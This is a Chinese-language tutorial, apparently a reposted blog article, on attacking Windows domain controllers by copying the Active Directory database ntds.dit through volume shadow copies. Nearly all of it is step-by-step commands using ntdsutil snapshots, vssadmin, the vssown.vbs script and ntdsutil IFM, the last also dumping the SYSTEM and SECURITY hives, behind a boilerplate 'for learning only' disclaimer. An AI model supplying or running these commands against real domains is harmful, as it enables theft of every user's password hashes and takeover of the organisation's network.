全网最全的 Cobalt Strike 使用教程-内网渗透之域控攻击篇！黑客技术零基础入门到精通教程建议收藏！

免责声明

本号所发布的文章及工具只限交流学习，本人不承担任何责任！

一、前言

在本篇文章中我将继续为大家介绍一些攻击域控制器时常用的一些方法，为了方便演示，我是直接在目标域控制器下进行一系列操作的，在真实环境下，大家需要通过 MSF、CS 等内网渗透工具获取目标主机权限时才可以执行后续操作。

二、域控制器攻击

在通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:\Windows\NTDS\ntds.dit文件（活动目录始终访问这个文件，所以文件被禁止读取)。使用Windows本地卷影拷贝服务，就可以获得文件的副本。

2.1 通过卷影拷贝服务提取ntds.dit

在活动目录中，所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件，存储位置为域控制器的%SystemRoot%\ntds\ntds.dit。ntds.dit中包含（但不限于）用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样，是被Windows操作系统锁定的。

2.1.1 通过ntdsutil.exe 提取 ntds.dit

ntdsutil.exe是一个为活动目录提供管理机制的命令行工具。使用ntdsutil.exe，可以维护和管理活动目录数据库、控制单个主机操作、创建应用程序目录分区、删除由未使用活动目录安装向导( DCPromo.exe)成功降级的域控制器留下的元数据等。该工具默认安装在域控制器上，可以在域控制器上直接操作，也可以通过域内机器在域控制器上远程操作。ntdsutil.exe支持的操作系统有Windows Server 2003、Windows Server 2008、Windows Server 2012。

1、创建快照，命令如下。

ntdsutil snapshot "activate instance ntds" create quit quit

可以看到这里会创建一个GUID为e48cb66b-7d5e-4e2d-acb7-cf16ae409d16的快照。

2、挂载快照，命令如下。

ntdsutil snapshot "mount {GUID}" quit quit

其中GUID的值为刚刚创建的快照的GUID

可以看到快照被加载到了C:\目录下。

3、拷贝快照，命令如下。

copy C:\$SNAP_202106111326_VOLUMEC$\windows\ntds\ntds.dit c:\windows\temp\ntds.dit

该命令用于将C:\\windows\ntds\ntds.dit复制到本地的c:\windows\temp\ntds.dit下。

4、卸载删除快照，命令如下。

ntdsutil snapshot "unmount {e48cb66b-7d5e-4e2d-acb7-cf16ae409d16}" "delete {e48cb66b-7d5e-4e2d-acb7-cf16ae409d16}" quit quit

其中的e48cb66b-7d5e-4e2d-acb7-cf16ae409d16为最开始创建的快照的GUID的值。

5、查看快照，命令如下。

ntdsutil snapshot "List All" quit quit

可以看到找不到快照了，说明快照已经成功卸载删除了。

2.1.2 通过vssadmin提取ntds.dit

vssadminn是Windows Server 2008及 Windows 7提供的VSS管理工具，可用于创建和删除卷影拷贝、列出卷影拷贝的信息（只能管理系统Provider 创建的卷影拷贝)、显示已安装的所有卷影拷贝写入程序( writers )和提供程序( providers )，以及改变卷影拷贝的存储空间(即所谓的“diff空间”)的大小等。

1、创建一个C盘的卷影拷贝，命令如下。

vssadmin create shadow /for=c:

2、将创建的卷影拷贝中的ntds.dit复制出来，命令如下。

copy 卷影副本卷名\windows\ntds\ntds.dit c:\ntds.dit

打开c盘，可以看到ntds.dit成功创建。

3、删除卷影，命令如下。

vssadmin delete shadows /for=c: /quiet

2.1.3 利用vssown.vbs 脚本提取ntds.dit

vssown.vbs脚本的功能和vssadmin类似。vssown.vbs脚本是由Tim Tomes 开发的，可用于创建和删除卷影拷贝，以及启动和停止卷影拷贝服务。

下载地址：https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs

1、启动卷影拷贝服务，命令如下。

cscript vssown.vbs /start

2、创建一个C盘的卷影拷贝，命令如下。

cscript vssown.vbs /create c

3、列出当前的卷影拷贝，命令如下。

cscript vssown.vbs /list

4、将ntds.dit复制出来，命令如下。

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit

dir c:\ | findstr “ntds”

该命令可以查看ntds.dit文件是否成功复制。

5、删除卷影拷贝，命令如下。

cscript vssown.vbs /delete {198D6716-2CC7-4AED-A011-4007EC8D0A7B}

{198D6716-2CC7-4AED-A011-4007EC8D0A7B}是卷影的ID，可以通过cscript vssown.vbs /list 进行查看。

2.1.4 使用 ntdsutil 的 IFM卷影拷贝

除了按照前面介绍的方法通过执行命令来提取ntds.dit，也可以使用创建一个IFM 的方式获取ntds.dit。在使用ntdsutil创建IFM时，需要进行生成快照、加载、将ntds.dit 和计算机的SAM文件复制到目标文件夹中等操作。`

在域控制器中以管理员模式打开命令行环境，输入如下命令。

ntdsutil "ac i ntds" "ifm" "create full c:/test" q q

运行该命令会在c盘下创建一个test文件夹，里面存放着ntds.dit，SYSTEM和SECURITY。